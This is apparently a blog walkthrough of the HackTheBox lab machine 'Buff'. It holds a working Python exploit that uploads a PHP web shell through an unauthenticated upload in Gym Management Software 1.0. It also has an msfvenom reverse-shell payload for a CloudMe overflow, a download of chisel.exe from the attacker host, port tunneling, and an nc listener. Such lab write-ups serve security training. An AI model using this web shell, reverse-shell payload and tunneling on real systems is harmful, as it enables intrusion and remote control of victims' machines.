hackthebox – Buff

Nmap scan

nmap -A -Pn -oN nmap.txt 10.10.10.198
TCP 8080 is found

Gym management software

This is the main page of the gym management web application
On the contact page it shows the Gym Management Software 1.0.

Gym Management Software vulnerability

By searching the web there is a vulnerability of Gym Management software version 1.0 – https://www.exploit-db.com/exploits/48506

The problem is that the upload.php in the software package only validates the file extension and the file type but no authentication is validated.

The code validates the file extension and the file types but no authentication.

Customized the original exploit script

import requests

# The following code is a modification from this source: https://www.exploit-db.com/exploits/48506

# the id arbitrary since authentication is not verified. Instead only the file extension
# and the file type are checked.
url = "http://10.10.10.198:8080/upload.php?id=cyruslab"
success = "http://10.10.10.198:8080/upload/cyruslab.php"

# https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
png_magic_bytes = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"

png = {
    "file": (
        "cyruslab.php.png",
        f"{png_magic_bytes}<?php echo shell_exec($_GET['cmd']); ?>",
        "image/png",
        {"content-disposition": "form-data"}
    )
}

form_data = dict(pupload="upload")
resp = requests.post(url=url, files=png, data=form_data, verify=False)

if resp.status_code == 200:
    try:
        # throws whichever output to the terminal
        while True:
            user_input = input(">")
            cmd_output = requests.get(success, params={"cmd": user_input}, verify=False)
            if cmd_output.status_code == 200:
                print(cmd_output.text)
    except KeyboardInterrupt as e:
        print("\nBye!")

This is how the script output looks like, basically the terminal looks like a shell but frankly it is not, the script uploads the cyruslab.php to the vulnerable path, the cyruslab.php contains:

<?php echo shell_exec($_GET['cmd']); ?>

the script simply displays the result of the command back to the terminal.

Get the user flag

Get the user’s flag after running the exploit

Cloudme and its vulnerability

Enumerating the shuan’s home directory a cloudme program is found.

cloudme

The cloudme uses port 8888 and listen on localhost on victim’s machine.

cloudme runs as a service

there is a working exploit written in python https://www.exploit-db.com/exploits/48389

The only item that needs to be changed in the original exploit script is the payload variable, on the script’s documentation it recommends the use of msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python

Later replace the output to this script:

Replace the original payload in the script with the msfvenom result.

Lateral movement with chisel

Chisel can be downloaded here. Basically this is a proxy software that can be use to do port forwarding.

On the attacker machine start the chisel server:

On the victim machine upload the chisel for windows.

Start the http server on attacker machine:

sudo python3 -m http.server 80

Then on victim machine run this command:

powershell Invoke-WebRequest -Uri http://10.10.14.9/chisel.exe -OutFile chisel.exe

Then on the victim machine run the chisel client:

chisel.exe client 10.10.14.9:8443 R:8888:127.0.0.1:8888

Successful connection will be like this:

Victim connects to the attacker machine
On attacker machine it will listen on port 8888

Whenever traffic throws to 127.0.0.1:8888 on attacker machine, the traffic will be tunneled to victim machine until its localhost:8888

Get the root flag

Setup nc server on attacker machine

nc -lvnp 4444

The port has to match the msfvenom configuration previously generated.

The run the exploit script modified with the configured msfvenom payload.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s